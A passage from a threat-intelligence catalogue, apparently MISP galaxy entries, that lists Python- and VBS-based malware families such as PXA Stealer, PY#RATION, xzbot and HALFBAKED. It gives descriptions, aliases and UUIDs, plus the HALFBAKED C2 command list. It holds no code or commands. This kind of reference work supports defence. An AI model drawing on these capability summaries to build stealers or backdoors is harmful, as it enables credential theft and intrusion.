PXA Stealer is an information-stealing malware written in Python, identified by Cisco Talos in an active campaign attributed to a Vietnamese-speaking threat actor (2024). The stealer targets sensitive data such as credentials for online accounts, VPN and FTP clients, financial information, browser cookies, and gaming-related data. Notably, PXA Stealer is capable of decrypting browser master passwords to exfiltrate stored credentials. The campaign leverages heavily obfuscated batch scripts for delivery and execution. The actor behind this operation is linked to the Telegram channel “Mua Bán Scan MINI,” known to host credential trade and cybercrime activity. While there are connections to the CoralRaider adversary, attribution to this group remains unconfirmed. In q2 2025 PXA stealer was observed to target Italy.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PXA Stealer.

Known Synonyms
PXA
PXAStealer
Internal MISP references

UUID 69aae68f-9831-4568-b3a7-0f492fea8c70 which can be used as unique global reference for PXA Stealer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PyAesLoader

Internal MISP references

UUID b9ba4f66-78dc-491f-8fd4-0143816ce80e which can be used as unique global reference for PyAesLoader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PyArk

Internal MISP references

UUID 01f15f4e-dd40-4246-9b99-c0d81306e37f which can be used as unique global reference for PyArk in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

pyback

Internal MISP references

UUID 6d96cd1e-98f4-4784-9982-397c5df19bd9 which can be used as unique global reference for pyback in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PylangGhost

Python-version of GolangGhost RAT

Internal MISP references

UUID 94ef1dd3-dc31-4dfa-8b09-5e0aefb8d29e which can be used as unique global reference for PylangGhost in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Pyramid

According to its author, Pyramid is a post exploitation framework written in Python, capable of executing offensive tooling from a signed binary (e.g. python.exe) by importing their dependencies in memory. It was created to demonstrate a bypass strategy against EDRs based on some blind-spots assumptions.

Internal MISP references

UUID d0c73fba-7dd5-49f9-a439-be0d960ebadb which can be used as unique global reference for Pyramid in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PY#RATION

According to Securonix, this malware exhibits remote access trojan (RAT) behavior, allowing for control of and persistence on the affected host. As with other RATs, PY#RATION possesses a whole host of features and capabilities, including data exfiltration and keylogging. What makes this malware particularly unique is its utilization of websockets for both command and control (C2) communication and exfiltration as well as how it evades detection from antivirus and network security measures.

Internal MISP references

UUID 1dc471d3-6303-48a1-a17a-b4f29e5ba6a9 which can be used as unique global reference for PY#RATION in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PyVil

PyVil RAT

Internal MISP references

UUID 2cf75f3c-116f-4faf-bd32-ba3a5e2327cf which can be used as unique global reference for PyVil in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

QUIETBOARD

Internal MISP references

UUID 6ebeed34-4a7d-44d8-ae44-83ae37cf5f2f which can be used as unique global reference for QUIETBOARD in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RedTiger Stealer

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RedTiger Stealer.

Known Synonyms
RedTiger Ste4ler
redtiger
redtiger-tools
Internal MISP references

UUID 045c0d7d-4840-4052-ad26-528e89a285b4 which can be used as unique global reference for RedTiger Stealer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Responder

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Responder.

Known Synonyms
SpiderLabs Responder
Internal MISP references

UUID 3271b5ca-c044-4ab8-bbfc-0d6e1a6601fc which can be used as unique global reference for Responder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

RN Stealer

Internal MISP references

UUID e0b1891f-c1a4-43c3-9944-a84dc32dd371 which can be used as unique global reference for RN Stealer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Saphyra

Internal MISP references

UUID 30a22cdb-9393-460b-86ae-08d97c626155 which can be used as unique global reference for Saphyra in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Serpent

According to Proofpoint, this is a backdoor written in Python, used in attacks against French entities in the construction, real estate, and government industries.

Internal MISP references

UUID 8052319b-f6da-4f53-a630-59245ff65eaf which can be used as unique global reference for Serpent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

SpaceCow

Internal MISP references

UUID ff5c0845-6740-45d5-bd34-1cf69c635356 which can be used as unique global reference for SpaceCow in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

stealler

Internal MISP references

UUID 689247a2-4e75-4802-ab94-484fc3d6a18e which can be used as unique global reference for stealler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Stitch

Internal MISP references

UUID 6239201b-a0bd-4f01-8bbe-79c6fc5fa861 which can be used as unique global reference for Stitch in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Stormous

Internal MISP references

UUID e2580f5e-417b-4f21-88ba-8d3e43514363 which can be used as unique global reference for Stormous in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

unidentified_002

Internal MISP references

UUID 7e5fe6ca-3323-409a-a5bb-d34f60197b99 which can be used as unique global reference for unidentified_002 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

unidentified_003

Internal MISP references

UUID 43282411-4999-4066-9b99-2e94a17acbd4 which can be used as unique global reference for unidentified_003 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

UPSTYLE

Internal MISP references

UUID 1824c463-77df-43af-a055-d94567918f6b which can be used as unique global reference for UPSTYLE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Venomous

Ransomware written in Python and delivered as compiled executable created using PyInstaller.

Internal MISP references

UUID 0bd5aed2-9c74-41a5-9fcf-9379f2cb0e2c which can be used as unique global reference for Venomous in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Venus Stealer

Venus Stealer is a python based Infostealer observed early 2023.

Internal MISP references

UUID 20f72d3c-87b7-4349-ad1b-59d7909c1df4 which can be used as unique global reference for Venus Stealer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

VileRAT

Internal MISP references

UUID aba54ca9-ef0d-4061-93d1-65251e90afad which can be used as unique global reference for VileRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

W4SP Stealer

A basic info stealer w/ some capability to inject code into legit applications.

Internal MISP references

UUID c4d46e47-3af8-4117-84ad-1e5699956f2b which can be used as unique global reference for W4SP Stealer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

WIREFIRE

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WIREFIRE.

Known Synonyms
GIFTEDVISITOR
Internal MISP references

UUID 54f3e853-5f0e-4940-9e27-79e6991886f9 which can be used as unique global reference for WIREFIRE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

KV

Internal MISP references

UUID 37784130-81fd-40d7-87d4-38e5085513bd which can be used as unique global reference for KV in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

PANIX

According to its author, PANIX is a powerful, modular, and highly customizable Linux persistence framework designed for security researchers, detection engineers, penetration testers, CTF enthusiasts, and more. Built with versatility in mind, PANIX emphasizes functionality, making it an essential tool for understanding and implementing a wide range of persistence techniques.

Internal MISP references

UUID 6f2badd8-1b67-4a93-be1e-0585f5359a08 which can be used as unique global reference for PANIX in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

xzbot

A backdoor brought into version 5.6.0 and 5.6.1 of compression library/tool xz/liblzma, which was intended to enable access via (Open)SSH on affected servers.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular xzbot.

Known Synonyms
xzorcist
Internal MISP references

UUID 293b9d76-8e58-48bc-936b-e8dfb00f6f6c which can be used as unique global reference for xzbot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

FlexiSpy (symbian)

Internal MISP references

UUID 9f85f4fc-1cce-4557-b3d8-b9ef522fafb2 which can be used as unique global reference for FlexiSpy (symbian) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

BASICSTAR

Internal MISP references

UUID ca86807d-5466-496a-b41f-4bde905f9064 which can be used as unique global reference for BASICSTAR in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

CageyChameleon

CageyChameleon Malware is a VBS-based backdoor which has the capability to enumerate the list of running processes and check for the presence of several antivirus products. CageyChameleon will collect user host information, system current process information, etc. The collected information is sent back to the C2 server, and continue to initiate requests to perform subsequent operations.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CageyChameleon.

Known Synonyms
Cabbage RAT
Internal MISP references

UUID ea71b7c1-79eb-4e9c-a670-ea75d80132f4 which can be used as unique global reference for CageyChameleon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

forbiks

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular forbiks.

Known Synonyms
Forbix
Internal MISP references

UUID 2ad12163-3a8e-4ece-969e-ac616303ebe1 which can be used as unique global reference for forbiks in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GamaWiper

According to ClearSky, this is a VBS-based wiper, deployed via exploitation of a vulnerable WinRAR version (CVE-2025-80880). They assess with medium confidence a link to Gamaredon.

Internal MISP references

UUID 343e4c9d-8645-42a0-b2de-eca9f79734ff which can be used as unique global reference for GamaWiper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GGLdr

Internal MISP references

UUID 8ca31b9b-6e78-4dcc-9d14-dfd97d44994e which can be used as unique global reference for GGLdr in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

GlowSpark

Internal MISP references

UUID ab6f8b6d-f0a0-4d2c-a81b-2dcb146914ea which can be used as unique global reference for GlowSpark in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

Grinju Downloader

Internal MISP references

UUID f0a64323-62a6-4c5a-bb3d-44bd3b11507f which can be used as unique global reference for Grinju Downloader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HALFBAKED

The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. HALFBAKED listens for the following commands from the C2 server:

info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI queries processList: Send list of process running screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1) runvbs: Executes a VB script runexe: Executes EXE file runps1: Executes PowerShell script delete: Delete the specified file update: Update the specified file

Internal MISP references

UUID 095c995c-c916-488e-944d-a3f4b9842926 which can be used as unique global reference for HALFBAKED in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
type []

HATVIBE

According to Sekoia, the aim of this backdoor is to receive VBS modules for execution from a remote C2 server. Once received, HATVIBE uses a simple XOR algorithm to decrypt each module, contact it between two